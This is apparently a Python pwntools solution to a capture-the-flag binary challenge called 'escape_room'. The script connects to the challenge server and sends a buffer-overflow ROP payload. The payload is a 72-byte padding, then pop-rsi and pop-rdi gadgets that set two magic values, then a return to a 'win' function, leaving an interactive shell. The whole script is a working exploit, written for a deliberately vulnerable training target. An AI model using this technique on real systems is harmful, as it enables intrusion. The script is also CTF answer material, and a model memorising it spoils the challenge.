#!/usr/bin/env python3
from pwn import *

context.binary = elf = ELF("./escape_room", checksec=False)

# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13566)
# p.recvuntil(b"keys?\n")
# Your exploit here

var1 = 0xDEADBEEF
var2 = 0xCAFEBABE
OFFSET = 72
# Gadget to overwrite rdi e rsi (pop)
# (Creati in main.c)
rdi = 0x401287
rsi = 0x401289
ret = 0x40101A
# win addr
win = 0x40121B
payload = flat(
    b"A" * OFFSET,
    p64(rsi),
    p64(var2),
    p64(rdi),
    p64(var1),
    p64(ret),
    p64(win),
)
p.send(payload)
# p.send(b'cat flag\n')
# p.recv()
p.interactive()